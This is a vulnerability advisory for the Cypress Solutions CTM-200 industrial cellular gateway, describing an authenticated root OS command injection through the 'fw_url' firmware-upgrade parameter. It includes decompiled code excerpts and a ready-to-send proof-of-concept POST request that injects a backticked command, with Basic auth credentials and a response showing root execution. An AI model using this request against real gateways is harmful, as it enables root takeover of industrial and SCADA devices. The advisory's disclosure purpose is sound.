Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection

`  
Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection  
  
  
Vendor: Cypress Solutions Inc.  
Product web page: https://www.cypress.bc.ca  
Affected version: 2.7.1.5659  
2.0.5.3356-184  
  
Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.  
The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.  
Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site  
office and SCADA communications.  
  
Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user  
through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd  
upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to  
the wget command in /usr/bin/cmdmain ELF binary.  
  
================================================================================================  
/www/cgi-bin/webif/ctm-config-upgrade.sh:  
-----------------------------------------  
  
136: if ! empty "$FORM_install_fw_url"; then  
137: echo "</pre>"  
138: echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"  
139: cmd upgradefw "$FORM_fw_url"  
140: unset FORM_install_fw_url FORM_submit  
141: echo "</pre><br />Done."  
142: fi  
==================================================================  
cmdmain (ELF):  
  
memset(&DAT_0003bd1c,0,0x80);  
make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);  
sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),  
*(undefined4 *)(iParm2 + 8));  
ctmsys(local_184);  
sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));  
iVar3 = ctm_fopen(local_184,"r");  
if (iVar3 == 0) {  
uVar5 = *(undefined4 *)(iParm2 + 8);  
__s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";  
goto LAB_0001f4a8;  
}  
ctm_fclose();  
memset(local_184,0,0x100);  
sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),  
*(undefined4 *)(iParm2 + 8));  
ctmsys(local_184);  
=================================================================  
cmd (ELF):  
  
while (sVar1 = strlen(__s2), uVar7 < sVar1) {  
__s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);  
__s2 = *ppcVar8;  
uVar7 = uVar7 + 1;  
}  
uStack180 = 0x7273752f;  
uStack176 = 0x6e69622f;  
uStack172 = 0x646d632f;  
uStack168 = 0x6d632f73;  
uStack164 = 0x69616d64;  
uStack160 = 0x6e;  
uStack159 = 0;  
iVar2 = execv((char *)&uStack180,ppcParm2);  
================================================================================================  
  
Tested on: GNU/Linux 2.6.32.25 (arm4tl)  
BusyBox v1.15.3  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5687  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php  
  
  
21.09.2021  
  
--  
  
  
PoC POST request:  
-----------------  
  
POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1  
Host: 192.168.1.100  
Connection: keep-alive  
Content-Length: 611  
Cache-Control: max-age=0  
Authorization: Basic YWRtaW46Q2hhbWVsZW9u  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.1.1  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6  
Cookie: style=null  
sec-gpc: 1  
  
------WebKitFormBoundaryZlABvwQnpLtpe9mM  
Content-Disposition: form-data; name="submit"  
  
1  
------WebKitFormBoundaryZlABvwQnpLtpe9mM  
Content-Disposition: form-data; name="upgradefile"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundaryZlABvwQnpLtpe9mM  
Content-Disposition: form-data; name="fw_url"  
  
`id`  
------WebKitFormBoundaryZlABvwQnpLtpe9mM  
Content-Disposition: form-data; name="install_fw_url"  
  
Start Firmware Upgrade from URL  
------WebKitFormBoundaryZlABvwQnpLtpe9mM  
Content-Disposition: form-data; name="pkgurl"  
  
  
------WebKitFormBoundaryZlABvwQnpLtpe9mM--  
  
  
  
Response:  
---------  
  
HTTP/1.1 200 OK  
Connection: close  
Transfer-Encoding: chunked  
Content-Type: text/html; charset=UTF-8  
Pragma: no-cache  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http: //www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http: //www.w3.org/1999/xhtml" lang="en" xml:lang="en">  
...  
...  
Firmware Management  
  
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!  
Saving configuration ...  
downloading firmware image: gid=0(root)/uid=0(root).tar  
found image:  
extracting image files  
Verifying checksum of downloaded firmware image  
Image checksum failed  
OK  
  
Done.  
...  
...  
</div>  
<br />  
<fieldset id="save">  
<legend><strong>Proceed Changes</strong></legend>  
<div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>  
<ul class="apply">  
<li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >&raquo; Save Configuration &laquo;</a></li>  
</ul>  
</fieldset>  
</form>  
<hr />  
<div id="footer">  
<h3>X-Wrt</h3>  
<em>End user extensions for OpenWrt</em>  
</div>  
</div> <!-- End #container -->  
</body>  
</html>  
`